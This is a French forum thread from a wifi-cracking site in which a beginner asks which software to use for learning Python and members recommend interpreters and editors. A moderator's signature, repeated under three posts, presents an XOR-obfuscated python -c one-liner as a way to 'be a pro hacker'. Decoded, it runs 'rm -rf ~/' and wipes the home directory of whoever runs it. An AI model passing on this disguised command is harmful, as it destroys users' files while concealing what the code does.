Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 15-11-2011 12:35:14

freekiss
Membre Indéboulonnable
Lieu : Belgique
Inscription : 07-09-2011
Messages : 108

programmer en python (quel logiciel)

Hello, n'ayant pas vu de section "programming",je post ici en esperant etre au bon endroit.

Voila, depuis hier je me lance avec python (grace au lien de noireaude, wink ), mais lorsque je lance python via la console, je sais debuter mais aucunes colorations ou continuitée ne se fait.

Je voudrais savoir si il y a un logiciel a installer afin de pouvoir m'aider dans mon apprentissage.

Les tabulations ne fonctionnes pas et tous reste en blanc..


PS: Apres une recherche je viend de trouver SPE qui est un editeur python donc merci de mettre ce post inutile a la corbeille car je ne peut editer mon titre pour mettre "resolu"

merci d'avance;

Cordialement,

Dernière modification par freekiss (15-11-2011 13:00:35)


Si j'étais un crapaud, je serais un backtractien, smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 15-11-2011 12:59:35

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : programmer en python (quel logiciel)

Salut freekiss wink

Tu lances quoi comme commande?

Il te faut l'interpréteur python, tu peux le télécharger selon la version que tu veux ou le trouver dans les synaptic wink

Hors Ligne

#3 15-11-2011 13:02:04

freekiss
Membre Indéboulonnable
Lieu : Belgique
Inscription : 07-09-2011
Messages : 108

Re : programmer en python (quel logiciel)

merci koala, je viend de trouver SPE( editeur python avec auto completion,..)

Je vais donc tester cela

Sinon, comme commande, je lance juste "python"

Cordialement,

Dernière modification par freekiss (15-11-2011 13:02:51)


Si j'étais un crapaud, je serais un backtractien, smile

Hors Ligne

#4 15-11-2011 13:06:39

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : programmer en python (quel logiciel)

Pour appeler ton programme tu te places dans le répertoire puis:

py mon codeenpython.py
ou
setup.py si tu as des modules a installer avec python
ou encore
./moncode.py

Hors Ligne

#5 15-11-2011 13:16:04

freekiss
Membre Indéboulonnable
Lieu : Belgique
Inscription : 07-09-2011
Messages : 108

Re : programmer en python (quel logiciel)

merci koala pour ta rapidité de réponse car en effet j'ai fais un petit test mais pas tres concluant, mdr.
Mon ordi ne me dis meme pas bonjours, wink

PS: " setup.py : commande introuvable "

                      ou


./test.py: Aucun fichier ou dossier de ce type

Normal??

Cordialement

Dernière modification par freekiss (15-11-2011 13:19:43)


Si j'étais un crapaud, je serais un backtractien, smile

Hors Ligne

#6 15-11-2011 13:24:49

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : programmer en python (quel logiciel)

cd/ le répertoire de ton script
py toncode.py

Hors Ligne

#7 15-11-2011 13:36:22

freekiss
Membre Indéboulonnable
Lieu : Belgique
Inscription : 07-09-2011
Messages : 108

Re : programmer en python (quel logiciel)

je vais refaire une mise a jour complete car py:commande introuvable malgres mon
cd /home/....../..py

Pourtant j'ai beaucoup de log en py (wifite.py) et tout fonctionne.

Je vais trouver, sinon je trouverais bien un logiciel (avantade de open source), wink


Cordialement,

Dernière modification par freekiss (15-11-2011 13:40:30)


Si j'étais un crapaud, je serais un backtractien, smile

Hors Ligne

#8 07-05-2012 14:42:58

Equador
Nouveau membre
Inscription : 07-05-2012
Messages : 7

Re : programmer en python (quel logiciel)

Si je peux m'permettre, tu devrai essayé PyScripter (version portable) qui est une interface de développement super utile, surtout si tu as l'habitude d'utiliser des I.D. genre CodeBlocks.

Le sujet date, mais il me paraissait indispensable d'en parler!


développeur Labview et python.

Hors Ligne

#9 07-05-2012 15:48:20

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : programmer en python (quel logiciel)

Moi j'utilise vim


1310812721.gif

Hors Ligne

#10 07-05-2012 20:45:25

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : programmer en python (quel logiciel)

Moi aussi.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#11 11-05-2012 10:51:21

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : programmer en python (quel logiciel)

Idem. Vim, Komodo sous OS X et NotePad++ sous Win.
Les trois fonctionnent très bien.


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#12 11-05-2012 18:37:48

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : programmer en python (quel logiciel)

Sous windows, l'IDLE livrée avec le setup de pythonest très bien aussi.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#13 23-08-2013 00:03:01

Rapside
Nouveau membre
Inscription : 22-08-2013
Messages : 5

Re : programmer en python (quel logiciel)

on peut programmer aussi depuis word pad comme le batch car python est un language non compilé.
pour faire des choses simples cela suffit.

Hors Ligne

#14 23-08-2013 08:07:01

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : programmer en python (quel logiciel)

Afin de préserver le monde de la dévastation, et pour d'autres raisons personnelles, je souhaiterais dire deux choses :

1.

Rapside a écrit :

on peut programmer aussi depuis word pad comme le batch car python est un language non compilé.
pour faire des choses simples cela suffit.

C'EST FAUX

Du python est compilé en bytecote python («.pyc») qui peut être éxécuté par la VM python.
Il est aussi compilé (ou interprété) que du java.


2.
C'est un jugement de valeur subjectif, mais le batch avec wordpad sous windows c'est nul.
Tu as du rater le fait que tout le monde est sous linux smile

3.

echo 'print "Hello, world"' > script.py
chmod +x script.py
./script.py

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]